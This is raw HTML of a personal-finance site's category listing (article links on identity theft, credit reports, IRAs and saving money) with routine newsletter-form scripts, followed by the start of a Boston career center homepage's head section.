class="author">by <span class="author-name"><a href="https://www.themix.net/author/jpotaka/" title="Posts by Josh Patoka" rel="author">Josh Patoka</a></span></div> </div> </div> </article> <article class="article item item-6"> <div class="image" style="background-image:url(https://www.themix.net/files/2019/02/pexels-photo-113717-600x400.jpeg);"><a href="https://www.themix.net/2018/09/4-money-moves-make-children/"></a></div> <div class="text"> <h3 class="category money "><span class="icon"></span> Money</h3> <h2 class="title"><a href="https://www.themix.net/2018/09/4-money-moves-make-children/">4 Money Moves to Make Before Having Children</a></h2> <p class="excerpt">Children aren’t cheap. These are some of the money moves you should make before having children</p> <div class="meta-data"> <div class="network-logo fg"><a href="https://www.themix.net/category/thefinancegenie/" title="The Finance Genie">The Finance Genie</a></div> <div class="divider">/</div> <div class="author">by <span class="author-name"><a href="https://www.themix.net/author/jpotaka/" title="Posts by Josh Patoka" rel="author">Josh Patoka</a></span></div> </div> </div> </article> <article class="article item item-7"> <div class="image" style="background-image:url(https://www.themix.net/files/2019/02/pexels-photo-267202-600x428.jpeg);"><a href="https://www.themix.net/2018/08/8-best-places-to-sell-shoes-for-cash/"></a></div> <div class="text"> <h3 class="category money "><span class="icon"></span> Money</h3> <h2 class="title"><a href="https://www.themix.net/2018/08/8-best-places-to-sell-shoes-for-cash/">8 Best Places to Sell Shoes for Cash</a></h2> <div class="meta-data"> <div class="network-logo fg"><a href="https://www.themix.net/category/thefinancegenie/" title="The Finance Genie">The Finance Genie</a></div> <div class="divider">/</div> <div class="author">by <span class="author-name"><a href="https://www.themix.net/author/jpotaka/" title="Posts by Josh Patoka" rel="author">Josh Patoka</a></span></div> </div> </div> </article> <article class="article item item-8"> <div class="image" style="background-image:url(https://www.themix.net/files/2019/02/pexels-photo-265685-600x398.jpeg);"><a href="https://www.themix.net/2018/08/7-legal-places-to-stream-movies-for-free-or-really-cheap/"></a></div> <div class="text"> <h3 class="category money "><span class="icon"></span> Money</h3> <h2 class="title"><a href="https://www.themix.net/2018/08/7-legal-places-to-stream-movies-for-free-or-really-cheap/">7 (Legal) Places to Stream Movies for Free (or Really Cheap!)</a></h2> <div class="meta-data"> <div class="network-logo fg"><a href="https://www.themix.net/category/thefinancegenie/" title="The Finance Genie">The Finance Genie</a></div> <div class="divider">/</div> <div class="author">by <span class="author-name"><a href="https://www.themix.net/author/jpotaka/" title="Posts by Josh Patoka" rel="author">Josh Patoka</a></span></div> </div> </div> </article> <article class="article item item-9"> <div class="image" style="background-image:url(https://www.themix.net/files/2019/02/pexels-photo-219837-600x401.jpeg);"><a href="https://www.themix.net/2018/08/can-getting-a-credit-freeze-stop-identity-theft/"></a></div> <div class="text"> <h3 class="category money "><span class="icon"></span> Money</h3> <h2 class="title"><a href="https://www.themix.net/2018/08/can-getting-a-credit-freeze-stop-identity-theft/">Can Getting a Credit Freeze Stop Identity Theft?</a></h2> <div class="meta-data"> <div class="network-logo fg"><a href="https://www.themix.net/category/thefinancegenie/" title="The Finance Genie">The Finance Genie</a></div> <div class="divider">/</div> <div class="author">by <span class="author-name"><a href="https://www.themix.net/author/jpotaka/" title="Posts by Josh Patoka" rel="author">Josh Patoka</a></span></div> </div> </div> </article> <article class="article item item-10"> <div class="image" style="background-image:url(https://www.themix.net/files/2019/02/cash-back-scam-600x400.jpg);"><a href="https://www.themix.net/2018/08/4-best-cash-back-apps-online-shopping/"></a></div> <div class="text"> <h3 class="category money "><span class="icon"></span> Money</h3> <h2 class="title"><a href="https://www.themix.net/2018/08/4-best-cash-back-apps-online-shopping/">The 4 Best Cash Back Apps for Online Shopping</a></h2> <div class="meta-data"> <div class="network-logo fg"><a href="https://www.themix.net/category/thefinancegenie/" title="The Finance Genie">The Finance Genie</a></div> <div class="divider">/</div> <div class="author">by <span class="author-name"><a href="https://www.themix.net/author/jpotaka/" title="Posts by Josh Patoka" rel="author">Josh Patoka</a></span></div> </div> </div> </article> <article class="article item item-11"> <div class="image" style="background-image:url(https://www.themix.net/files/2019/02/nature-laptop-outside-macbook-600x400.jpg);"><a href="https://www.themix.net/2018/08/6-steps-to-prevent-identity-theft-today/"></a></div> <div class="text"> <h3 class="category money "><span class="icon"></span> Money</h3> <h2 class="title"><a href="https://www.themix.net/2018/08/6-steps-to-prevent-identity-theft-today/">6 Steps to Prevent Identity Theft Today</a></h2> <div class="meta-data"> <div class="network-logo fg"><a href="https://www.themix.net/category/thefinancegenie/" title="The Finance Genie">The Finance Genie</a></div> <div class="divider">/</div> <div class="author">by <span class="author-name"><a href="https://www.themix.net/author/jpotaka/" title="Posts by Josh Patoka" rel="author">Josh Patoka</a></span></div> </div> </div> </article> <article class="article item item-12"> <div class="image" style="background-image:url(https://www.themix.net/files/2018/08/2019.04.23-12.58-themixnet-5cbf0bd834971-600x389.jpg);"><a href="https://www.themix.net/2018/08/millennials-not-check-their-credit-reports/"></a></div> <div class="text"> <h3 class="category money "><span class="icon"></span> Money</h3> <h2 class="title"><a href="https://www.themix.net/2018/08/millennials-not-check-their-credit-reports/">Millennials Are 5.5X More Likely Than Baby Boomers to Not Check Their Credit Reports</a></h2> <div class="meta-data"> <div class="network-logo fg"><a href="https://www.themix.net/category/thefinancegenie/" title="The Finance Genie">The Finance Genie</a></div> <div class="divider">/</div> <div class="author">by <span class="author-name"><a href="https://www.themix.net/author/vmistry/" title="Posts by Vipul Mistry" rel="author">Vipul Mistry</a></span></div> </div> </div> </article> <article class="article item item-13"> <div class="image" style="background-image:url(https://www.themix.net/files/2019/02/pexels-photo-938965-600x345.jpeg);"><a href="https://www.themix.net/2018/08/fidelity-or-vanguard/"></a></div> <div class="text"> <h3 class="category money "><span class="icon"></span> Money</h3> <h2 class="title"><a href="https://www.themix.net/2018/08/fidelity-or-vanguard/">Fidelity or Vanguard? Which is the Better Option for Investors?</a></h2> <div class="meta-data"> <div class="network-logo fg"><a href="https://www.themix.net/category/thefinancegenie/" title="The Finance Genie">The Finance Genie</a></div> <div class="divider">/</div> <div class="author">by <span class="author-name"><a href="https://www.themix.net/author/jpotaka/" title="Posts by Josh Patoka" rel="author">Josh Patoka</a></span></div> </div> </div> </article> <article class="article item item-14"> <div class="image" style="background-image:url(https://www.themix.net/files/2019/02/family-pier-man-woman-39691-600x400.jpeg);"><a href="https://www.themix.net/2018/08/how-to-fly-a-family-of-four-using-only-points-and-cash-back-credit-cards/"></a></div> <div class="text"> <h3 class="category money "><span class="icon"></span> Money</h3> <h2 class="title"><a href="https://www.themix.net/2018/08/how-to-fly-a-family-of-four-using-only-points-and-cash-back-credit-cards/">How to Fly A Family Of Four Using Only Points and Cash Back Credit Cards</a></h2> <div class="meta-data"> <div class="network-logo fg"><a href="https://www.themix.net/category/thefinancegenie/" title="The Finance Genie">The Finance Genie</a></div> <div class="divider">/</div> <div class="author">by <span class="author-name"><a href="https://www.themix.net/author/vmistry/" title="Posts by Vipul Mistry" rel="author">Vipul Mistry</a></span></div> </div> </div> </article> <article class="article item item-15"> <div class="image" style="background-image:url(https://www.themix.net/files/2019/02/mobile-phone-money-banknotes-us-dollars-163069-600x442.jpeg);"><a href="https://www.themix.net/2018/08/6-secrets-save-money-amazon/"></a></div> <div class="text"> <h3 class="category money "><span class="icon"></span> Money</h3> <h2 class="title"><a href="https://www.themix.net/2018/08/6-secrets-save-money-amazon/">6 Secrets To Save Money at Amazon</a></h2> <p class="excerpt">Find out a few secrets to save money on your next shopping trip to Amazon. There are two different options to save money at Amazon</p> <div class="meta-data"> <div class="network-logo fg"><a href="https://www.themix.net/category/thefinancegenie/" title="The Finance Genie">The Finance Genie</a></div> <div class="divider">/</div> <div class="author">by <span class="author-name"><a href="https://www.themix.net/author/jpotaka/" title="Posts by Josh Patoka" rel="author">Josh Patoka</a></span></div> </div> </div> </article> <article class="article item item-16"> <div class="image" style="background-image:url(https://www.themix.net/files/2019/02/individual-retirement-account-600x400.jpg);"><a href="https://www.themix.net/2018/08/what-is-an-ira/"></a></div> <div class="text"> <h3 class="category money "><span class="icon"></span> Money</h3> <h2 class="title"><a href="https://www.themix.net/2018/08/what-is-an-ira/">Breaking It Down: What Is An IRA?</a></h2> <p class="excerpt">Many people wonder what is an IRA. It stands for Individual Retirement Account. One main benefit is you receive favorable treatment from tax authorities.</p> <div class="meta-data"> <div class="network-logo fg"><a href="https://www.themix.net/category/thefinancegenie/" title="The Finance Genie">The Finance Genie</a></div> <div class="divider">/</div> <div class="author">by <span class="author-name"><a href="https://www.themix.net/author/bmarcene/" title="Posts by Brandi Marcene" rel="author">Brandi Marcene</a></span></div> </div> </div> </article> <article class="article item item-17"> <div class="image" style="background-image:url(https://www.themix.net/files/2019/02/M1-Investing-homepage-600x659.jpg);"><a href="https://www.themix.net/2018/07/m1-finance-review-trade-stocks-and-etfs-for-free/"></a></div> <div class="text"> <h3 class="category money "><span class="icon"></span> Money</h3> <h2 class="title"><a href="https://www.themix.net/2018/07/m1-finance-review-trade-stocks-and-etfs-for-free/">M1 Finance Review &#8211; Trade Stocks and ETFs for FREE.</a></h2> <div class="meta-data"> <div class="network-logo fg"><a href="https://www.themix.net/category/thefinancegenie/" title="The Finance Genie">The Finance Genie</a></div> <div class="divider">/</div> <div class="author">by <span class="author-name"><a href="https://www.themix.net/author/jpotaka/" title="Posts by Josh Patoka" rel="author">Josh Patoka</a></span></div> </div> </div> </article> <article class="article item item-18"> <div class="image" style="background-image:url(https://www.themix.net/files/2019/02/staniel-cay-swimming-pig-seagull-fish-66258-600x401.jpeg);"><a href="https://www.themix.net/2018/07/things-the-u-s-government-spends-money-on/"></a></div> <div class="text"> <h3 class="category money "><span class="icon"></span> Money</h3> <h2 class="title"><a href="https://www.themix.net/2018/07/things-the-u-s-government-spends-money-on/">15 Unbelievable Things the U.S. Government Spends Money On!</a></h2> <p class="excerpt">Here are 15 of the most ridiculous things the US Government spends the money you pay in taxes on each year.</p> <div class="meta-data"> <div class="network-logo fg"><a href="https://www.themix.net/category/thefinancegenie/" title="The Finance Genie">The Finance Genie</a></div> <div class="divider">/</div> <div class="author">by <span class="author-name"><a href="https://www.themix.net/author/sdedyne/" title="Posts by Sandra Dedeyne" rel="author">Sandra Dedeyne</a></span></div> </div> </div> </article> </div> <div id="nav-load" class="nav-load"></div> <div class="nav-load-buttons"> <div class="load-more-button"><a href="https://www.themix.net/category/thefinancegenie/page/2/">Load More</a></div> </div> </div> <div class="disclosure light"> <p><strong>Disclosure:</strong> The information provided by The Financial Genie is for informational purposes only. It should not be considered legal or financial advice. You should consult with an attorney or other professional to determine what may be best for your individual needs. The Financial Genie does not make any guarantee or other promise as to any results that may be obtained from using our content. No one should make any investment decision without first consulting his or her own financial advisor and conducting his or her own research and due diligence. Additionally, some of the organizations with products on our site may pay us a referral fee or affiliate commission when you click to apply for those products.</p> </div> </div> </div> <div class="right"> <div class="sidebar"> <div class="sidebar-block advertisement"> <div class="inner"> <div class="content"> <div class="advertisement align-center ad-desktop-300x250 ad-mobile-300x250"> <div class="ad-label">Advertisement</div> <div class="ad"><div id="imk300topRail"></div></div> </div> </div> </div> </div> <div class="sidebar-block latest-stories"> <div class="inner"> <div class="content"> <div class="title-wrap small"><div class="icon"></div> <h2 class="title">Latest Stories</h2></div> <div class="articles mini masonry"> <div class="grid-sizer"></div> <article class="article item"> <div class="image" style="background-image:url(https://www.themix.net/files/2019/05/2019.05.15-02.29-themixnet-5cdc2263bc23c-200x100.jpg);"> <a href="https://www.themix.net/2019/05/ufc-237-namajunas-vs-andrade-the-thrill-and-the-agony/?utm_source=right-rail-latest"></a> </div> <div class="text"> <h2 class="title"><a href="https://www.themix.net/2019/05/ufc-237-namajunas-vs-andrade-the-thrill-and-the-agony/?utm_source=right-rail-latest">UFC 237: Namajunas Vs. Andrade &#8220;The Thrill And The Agony&#8221;</a></h2> <div class="meta-data"> <div class="date-time"><span class="date"><time class="date" datetime="2019-05-16">2 hours ago</time></span></div> <div class="network-logo fl"><a href="https://www.themix.net/category/fightline/" title="Fightline">Fightline</a></div> </div> </div> </article> <article class="article item"> <div class="image" style="background-image:url(https://www.themix.net/files/2019/03/2019.03.30-12.28-themixnet-5c9eb82ee5395-200x99.jpg);"> <a href="https://www.themix.net/2019/05/ufc-239-will-thiago-santos-try-to-take-jon-jones-down/?utm_source=right-rail-latest"></a> </div> <div class="text"> <h2 class="title"><a href="https://www.themix.net/2019/05/ufc-239-will-thiago-santos-try-to-take-jon-jones-down/?utm_source=right-rail-latest">UFC 239: Will Thiago Santos Try to Take Jon Jones Down?</a></h2> <div class="meta-data"> <div class="date-time"><span class="date"><time class="date" datetime="2019-05-16">2 hours ago</time></span></div> <div class="network-logo mmaf"><a href="https://www.themix.net/category/mmafrenzy/" title="MMA Frenzy">MMA Frenzy</a></div> </div> </div> </article> <article class="article item"> <div class="image" style="background-image:url(https://www.themix.net/files/2019/02/Sasha_Banks_bio-a81ea1d452f022bd65e6e4920af37de2-1-200x110.png);"> <a href="https://www.themix.net/2019/05/how-sasha-can-make-a-bank-statement-this-sunday/?utm_source=right-rail-latest"></a> </div> <div class="text"> <h2 class="title"><a href="https://www.themix.net/2019/05/how-sasha-can-make-a-bank-statement-this-sunday/?utm_source=right-rail-latest">How Sasha Can Make A Bank Statement</a></h2> <div class="meta-data"> <div class="date-time"><span class="date"><time class="date" datetime="2019-05-16">5 hours ago</time></span></div> <div class="network-logo wn"><a href="https://www.themix.net/category/wrestlenewz/" title="Wrestle Newz">Wrestle Newz</a></div> </div> </div> </article> </div> </div> </div> </div> <div class="sidebar-block advertisement"> <div class="inner"> <div class="content"> <div class="advertisement align-center ad-desktop-300x250 ad-mobile-300x250"> <div class="ad-label">Advertisement</div> <div class="ad"> <SCRIPT SRC="https://ib.adnxs.com/ttj?id=15550811" TYPE="text/javascript"></SCRIPT> <div id="imk300flextop"></div></div> </div> </div> </div> </div> <div class="sidebar-block trending-stories"> <div class="inner"> <div class="content"> <div class="title-wrap small"><div class="icon"></div> <h2 class="title">Trending Stories</h2></div> <div class="articles mini masonry"> <div class="grid-sizer"></div> <article class="article item"> <div class="image" style="background-image:url(https://www.themix.net/files/2019/05/2019.05.12-07.19-themixnet-5cd871dcacead-200x112.jpg);"> <a href="https://www.themix.net/2019/05/wwe-superstars-celebrating-mothers-day-photos/?utm_source=right-rail-trending"></a> </div> <div class="text"> <h2 class="title"><a href="https://www.themix.net/2019/05/wwe-superstars-celebrating-mothers-day-photos/?utm_source=right-rail-trending">WWE Superstars Celebrating Mother&#8217;s Day (Photos)</a></h2> <div class="meta-data"> <div class="date-time"><span class="date"><time class="date" datetime="2019-05-12">4 days ago</time></span></div> <div class="network-logo wn"><a href="https://www.themix.net/category/wrestlenewz/" title="Wrestle Newz">Wrestle Newz</a></div> </div> </div> </article> <article class="article item"> <div class="image" style="background-image:url(https://www.themix.net/files/2019/04/2019.04.20-12.23-themixnet-5cba6684e604a-200x112.png);"> <a href="https://www.themix.net/2019/05/jack-swaggers-controversial-bellator-221-win-sheamus-in-bad-shape/?utm_source=right-rail-trending"></a> </div> <div class="text"> <h2 class="title"><a href="https://www.themix.net/2019/05/jack-swaggers-controversial-bellator-221-win-sheamus-in-bad-shape/?utm_source=right-rail-trending">Jack Swagger&#8217;s Controversial Bellator 221 Win, Sheamus In Bad Shape</a></h2> <div class="meta-data"> <div class="date-time"><span class="date"><time class="date" datetime="2019-05-12">4 days ago</time></span></div> <div class="network-logo wn"><a href="https://www.themix.net/category/wrestlenewz/" title="Wrestle Newz">Wrestle Newz</a></div> </div> </div> </article> <article class="article item"> <div class="image" style="background-image:url(https://www.themix.net/files/2019/05/2019.05.06-12.27-themixnet-5cd0282b93c88-200x105.jpg);"> <a href="https://www.themix.net/2019/05/are-seth-rollins-and-becky-lynch-wwes-latest-couple/?utm_source=right-rail-trending"></a> </div> <div class="text"> <h2 class="title"><a href="https://www.themix.net/2019/05/are-seth-rollins-and-becky-lynch-wwes-latest-couple/?utm_source=right-rail-trending">Are Seth Rollins And Becky Lynch WWE&#8217;s Latest Couple?</a></h2> <div class="meta-data"> <div class="date-time"><span class="date"><time class="date" datetime="2019-05-06">1 week ago</time></span></div> <div class="network-logo ri"><a href="https://www.themix.net/category/ringsideintel/" title="Ringside Intel">Ringside Intel</a></div> </div> </div> </article> </div> </div> </div> </div> <div class="sidebar-block advertisement"> <div class="inner"> <div class="content"> <div class="advertisement align-center ad-desktop-300x250 ad-mobile-300x250"> <div class="ad-label">Advertisement</div> <div class="ad"><div id="imk300flexmid"></div></div> </div> </div> </div> </div> </div> <div class="sidebar sticky"> <div class="sidebar-block advertisement"> <div class="inner"> <div class="content"> <div class="advertisement align-center ad-desktop-300x250 ad-mobile-300x250"> <div class="ad-label">Advertisement</div> <div class="ad"></div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> <div id="subscribe" class="email-signup block contained-width width-768"> <div class="inner"> <div class="content pad-top-5 pad-bottom-5"> <div class="logo-form-social"> <div class="mix-it-up-logo"><a href="#"></a></div> <div class="news-subscribe-form enews"> <script>var rfnames=new Array("CI_email","CI_custom5","CI_custom4","CI_custom6"),rfdesc=new Array("Email Address","CI_Signup_Date","Source","source1"),val_email_names=new Array("CI_email"),val_email_desc=new Array("Email Address"),val_phone_names=new Array,val_phone_desc=new Array,val_zipcode_names=new Array,val_zipcode_desc=new Array,val_numeric_names=new Array,val_numeric_desc=new Array,whitespace_CI=" \t\n\r";function isValidEmail_CI(e){if(isEmpty_CI(e))return!1;if(isWhitespace_CI(e))return!1;for(var r=1,n=e.length;r<n&&"@"!=e.charAt(r);)r++;if(r>=n||"@"!=e.charAt(r))return!1;for(r+=2;r<n&&"."!=e.charAt(r);)r++;return!(r>=n-1||"."!=e.charAt(r))}function isValidPhone_CI(e){if(isEmpty_CI(e))return!1;if(isWhitespace_CI(e))return!1;return!!/^\(?([0-9]{3})\)?[-. ]?([0-9]{3})[-. ]?([0-9]{4})$/.test(e)}function isValidZipCode_CI(e){if(isEmpty_CI(e))return!1;if(isWhitespace_CI(e))return!1;return!!/(^\d{5}$)|(^\d{5}-\d{4}$)/.test(e)}function isNumeric_CI(e){return!isEmpty_CI(e)&&(!isWhitespace_CI(e)&&(!isNaN(parseFloat(e))&&isFinite(e)))}function isEmpty_CI(e){return null==e||0==e.length}function isWhitespace_CI(e){var r;if(isEmpty_CI(e))return!0;for(r=0;r<e.length;r++){var n=e.charAt(r);if(-1==whitespace_CI.indexOf(n))return!1}return!0}function checkForm_CI_Footer(){for(var e="",r=0;r<rfnames.length;r++)""==document.CI_subscribeForm_Footer.elements[rfnames[r]].value&&(document.CI_subscribeForm_Footer.elements[rfnames[r]].style.backgroundColor="#f9eaeb",e=e+rfdesc[r]+" is required \n\r");for(r=0;r<val_email_names.length;r++)""==document.CI_subscribeForm_Footer.elements[val_email_names[r]].value||isValidEmail_CI(document.CI_subscribeForm_Footer.elements[val_email_names[r]].value)||(document.CI_subscribeForm_Footer.elements[val_email_names[r]].style.backgroundColor="#f9eaeb",e=e+val_email_desc[r]+" must be a valid email address. ([email protected])\n\r");for(r=0;r<val_phone_names.length;r++)""==document.CI_subscribeForm_Footer.elements[val_phone_names[r]].value||isValidPhone_CI(document.CI_subscribeForm_Footer.elements[val_phone_names[r]].value)||(document.CI_subscribeForm_Footer.elements[val_phone_names[r]].style.backgroundColor="#f9eaeb",e=e+val_phone_desc[r]+" must be a valid phone number \n\r");for(r=0;r<val_zipcode_names.length;r++)""==document.CI_subscribeForm_Footer.elements[val_zipcode_names[r]].value||isValidZipCode_CI(document.CI_subscribeForm_Footer.elements[val_zipcode_names[r]].value)||(document.CI_subscribeForm_Footer.elements[val_zipcode_names[r]].style.backgroundColor="#f9eaeb",e=e+val_zipcode_desc[r]+" must be a valid zipcode \n\r");for(r=0;r<val_numeric_names.length;r++)""==document.CI_subscribeForm_Footer.elements[val_numeric_names[r]].value||isNumeric_CI(document.CI_subscribeForm_Footer.elements[val_numeric_names[r]].value)||(document.CI_subscribeForm_Footer.elements[val_numeric_names[r]].style.backgroundColor="#f9eaeb",e=e+val_numeric_desc[r]+" must be numeric \n\r");if(e.length>1)return alert(e),!1;document.CI_subscribeForm_Footer.submit()}</script> <form action="https://portal.criticalimpact.com/wc/wc.cfm" name="CI_subscribeForm_Footer" id="CI_subscribeForm_Footer" method="post"> <input type="hidden" name="CI_thankyou" value="https://portal.criticalimpact.com/wc/thankyou.cfm"> <input type="hidden" name="CI_thankyou2" value="https://portal.criticalimpact.com/wc/thankyou2.cfm"> <input type="hidden" name="CI_err" value="https://portal.criticalimpact.com/wc/error.cfm"> <input type="hidden" name="CI_Action" value="sub"> <input type="hidden" name="CI_LID" value="2621417731"><input type="hidden" name="CI_MID" value="147471090"><input type="hidden" name="CI_FID2" value="1000K2200000000018Q"><input type="hidden" name="CI_triggeredid" value="843369541"> <input type="hidden" name="CI_custom5" value="05/16/2019 09:45:11"> <input type="hidden" name="CI_custom4" value="tmx"> <input type="hidden" name="CI_custom6" value="fg-footer"> <input type="text" name="CI_email" maxlength="150" placeholder="Enter Email"> <button id="CI_submit" name="CI_submit" type="button" onClick="checkForm_CI_Footer();">Subscribe</button> </form> <script>function my_getParamVal(param) { var query = location.search; var regexp = new RegExp("[\\?&]" + param + "\=([^\&#]*)", "i"); var val = query.match(regexp) || ""; return val[1] || ""; } if (document.forms.CI_subscribeForm_Footer !== undefined && document.forms.CI_subscribeForm_Footer.CI_email !== undefined){ var t_email = my_getParamVal('myemail'); if (t_email !== undefined && typeof t_email === 'string' && t_email.length > 5) { document.forms.CI_subscribeForm_Footer.CI_email.value = t_email; } }</script> </div> </div> <div class="text"> <h4>Subscribe and get our daily emails and follow us on social media.</h4> </div> <div class="terms-privacy"><p>By opting in, you agree to receive emails with the latest in Lifestyle + Entertainment from TellMeNow. Your information will not be shared with or sold to 3rd parties.</p></div> </div> </div> </div> <footer id="footer"> <div class="footer block"> <div class="inner"> <div class="content"> <div class="footer-social"> <div class="social-buttons"> <div class="menu-social-buttons-fg-footer-container"><ul id="menu-social-buttons-fg-footer" class="menu"><li id="menu-item-146002" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-146002"><a target="_blank" rel="noopener noreferrer" href="https://www.facebook.com/TheFinanceGenie/">Facebook</a></li> <li id="menu-item-146003" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-146003"><a target="_blank" rel="noopener noreferrer" href="https://twitter.com/TheFinanceGenie">Twitter</a></li> <li id="menu-item-146004" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-146004"><a href="#subscribe">Subscribe</a></li> <li id="menu-item-146005" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-146005"><a target="_blank" rel="noopener noreferrer" href="https://dev.themix.net/category/thefinancegenie/feed/">RSS</a></li> </ul></div> </div> </div> <div class="footer-nav-credit"> <nav class="footer-nav"> <div class="menu-main-nav-global-footer-container"><ul id="menu-main-nav-global-footer" class="menu"><li id="menu-item-138939" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-138939"><a href="https://www.themix.net/about/">About</a></li> <li id="menu-item-138938" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-138938"><a href="https://www.themix.net/contact/">Contact</a></li> <li id="menu-item-138940" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-privacy-policy menu-item-138940"><a href="https://www.themix.net/privacy-policy/">Privacy</a></li> <li id="menu-item-138943" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-138943"><a href="https://www.themix.net/subscribe/">Subscribe</a></li> <li id="menu-item-138941" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-138941"><a href="https://www.themix.net/jobs/">Jobs</a></li> <li id="menu-item-138942" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-138942"><a href="https://www.themix.net/advertising/">Advertising</a></li> </ul></div> </nav> <div class="footer-network-nav"> <h4 class="network-sites">More From Our Network</h4> <div class="menu-network-nav-footer-container"><ul id="menu-network-nav-footer" class="menu"><li id="menu-item-138956" class="tmx menu-item menu-item-type-custom menu-item-object-custom menu-item-home menu-item-138956"><a href="https://www.themix.net/"><span class="icon grayscale"></span>TheMix.net<span class="icon color"></span></a></li> <li id="menu-item-138957" class="tmn menu-item menu-item-type-taxonomy menu-item-object-category menu-item-138957"><a href="https://www.themix.net/category/tellmenow/"><span class="icon grayscale"></span>TellMeNow<span class="icon color"></span></a></li> <li id="menu-item-138958" class="ci menu-item menu-item-type-taxonomy menu-item-object-category menu-item-138958"><a href="https://www.themix.net/category/cagedinsider/"><span class="icon grayscale"></span>Caged Insider<span class="icon color"></span></a></li> <li id="menu-item-138959" class="fl menu-item menu-item-type-taxonomy menu-item-object-category menu-item-138959"><a href="https://www.themix.net/category/fightline/"><span class="icon grayscale"></span>Fightline<span class="icon color"></span></a></li> <li id="menu-item-138960" class="mmaf menu-item menu-item-type-taxonomy menu-item-object-category menu-item-138960"><a href="https://www.themix.net/category/mmafrenzy/"><span class="icon grayscale"></span>MMA Frenzy<span class="icon color"></span></a></li> <li id="menu-item-138962" class="wn menu-item menu-item-type-taxonomy menu-item-object-category menu-item-138962"><a href="https://www.themix.net/category/wrestlenewz/"><span class="icon grayscale"></span>Wrestle Newz<span class="icon color"></span></a></li> <li id="menu-item-138961" class="ri menu-item menu-item-type-taxonomy menu-item-object-category menu-item-138961"><a href="https://www.themix.net/category/ringsideintel/"><span class="icon grayscale"></span>Ringside Intel<span class="icon color"></span></a></li> <li id="menu-item-141423" class="bic menu-item menu-item-type-taxonomy menu-item-object-category menu-item-141423"><a href="https://www.themix.net/category/boundingintocomics/"><span class="icon grayscale"></span>Bounding Into Comics<span class="icon color"></span></a></li> <li id="menu-item-141424" class="kn menu-item menu-item-type-taxonomy menu-item-object-category menu-item-141424"><a href="https://www.themix.net/category/kayfabenews/"><span class="icon grayscale"></span>Kayfabe News<span class="icon color"></span></a></li> <li id="menu-item-145998" class="fg menu-item menu-item-type-taxonomy menu-item-object-category current-menu-item menu-item-145998"><a href="https://www.themix.net/category/thefinancegenie/" aria-current="page"><span class="icon grayscale"></span>The Finance Genie<span class="icon color"></span></a></li> <li id="menu-item-138965" class="mmal menu-item menu-item-type-custom menu-item-object-custom menu-item-138965"><a target="_blank" rel="noopener noreferrer" href="https://www.mmalinker.com"><span class="icon grayscale"></span>MMA Linker<span class="icon color"></span></a></li> </ul></div> </div> <div class="credits"> <p><span class="copyright">&copy;2019 TheMix.net</span></p> <p class="design-dev"><a href="https://www.precisioncreations.com" target="_blank">Designed &amp; Developed by<br class="rwd-break rwd-break-1" /> <span>Precision Creations</span></a></p> </div> </div> </div> </div> </div> </footer> </div> </div> <script async src="https://platform.twitter.com/widgets.js"></script> <script src='https://www.themix.net/wp-includes/js/wp-embed.min.js?ver=5.2'></script> </body> </html>
0
<!DOCTYPE html> <html class="avada-html-layout-wide" lang="en-US" prefix="og: http://ogp.me/ns# fb: http://ogp.me/ns/fb# og: http://ogp.me/ns#"> <head> <meta http-equiv="X-UA-Compatible" content="IE=edge" /> <meta http-equiv="Content-Type" content="text/html; charset=utf-8"/> <meta name="viewport" content="width=device-width, initial-scale=1" /> <title>Home - MassHire Downtown Boston Career Center</title> <!-- This site is optimized with the Yoast SEO plugin v11.1.1 - https://yoast.com/wordpress/plugins/seo/ --> <link rel="canonical" href="https://masshiredowntownboston.org/" /> <meta property="og:locale" content="en_US" /> <meta property="og:type" content="website" /> <meta property="og:title" content="Home - MassHire Downtown Boston Career Center" /> <meta property="og:url" content="https://masshiredowntownboston.org/" /> <meta property="og:site_name" content="MassHire Downtown Boston Career Center" /> <meta name="twitter:card" content="summary" /> <meta name="twitter:title" content="Home - MassHire Downtown Boston Career Center" /> <meta name="twitter:site" content="@ALWorksSystem" /> <meta name="twitter:creator" content="@ALWorksSystem" /> <script type='application/ld+json' class='yoast-schema-graph yoast-schema-graph--main'>{"@context":"https://schema.org","@graph":[{"@type":"Organization","@id":"https://masshiredowntownboston.org/#organization","name":"","url":"https://masshiredowntownboston.org/","sameAs":["http://www.facebook.com/AlabamaWorks","https://twitter.com/ALWorksSystem"]},{"@type":"WebSite","@id":"https://masshiredowntownboston.org/#website","url":"https://masshiredowntownboston.org/","name":"MassHire Downtown Boston Career Center","publisher":{"@id":"https://masshiredowntownboston.org/#organization"},"potentialAction":{"@type":"SearchAction","target":"https://masshiredowntownboston.org/?s={search_term_string}","query-input":"required name=search_term_string"}},{"@type":"WebPage","@id":"https://masshiredowntownboston.org/#webpage","url":"https://masshiredowntownboston.org/","inLanguage":"en-US","name":"Home - MassHire Downtown Boston Career Center","isPartOf":{"@id":"https://masshiredowntownboston.org/#website"},"about":{"@id":"https://masshiredowntownboston.org/#organization"},"datePublished":"2016-10-20T21:21:24+00:00","dateModified":"2019-05-14T16:32:10+00:00"}]}</script> <!-- / Yoast SEO plugin. --> <link rel='dns-prefetch' href='//www.google.com' /> <link rel='dns-prefetch' href='//s.w.org' /> <link rel="alternate" type="application/rss+xml" title="MassHire Downtown Boston Career Center &raquo; Feed" href="https://masshiredowntownboston.org/feed/" /> <link rel="alternate" type="application/rss+xml" title="MassHire Downtown Boston Career Center &raquo; Comments Feed" href="https://masshiredowntownboston.org/comments/feed/" /> <link rel="alternate" type="text/calendar" title="MassHire Downtown Boston Career Center &raquo; iCal Feed" href="https://masshiredowntownboston.org/events-calendar/?ical=1" /> <link rel="shortcut icon" href="https://masshiredowntownboston.org/wp-content/uploads/favicon.ico" type="image/x-icon" /> <meta property="og:title" content="Home"/> <meta property="og:type" content="article"/> <meta property="og:url" content="https://masshiredowntownboston.org/"/> <meta property="og:site_name" content="MassHire Downtown Boston Career Center"/> <meta property="og:description" content="MASSHIRE DOWNTOWN BOSTON CAREER CENTER Let&#039;s Get to Work! JOB SEEKERS EMPLOYERS Find more resources below Featured Events"/> <meta property="og:image" 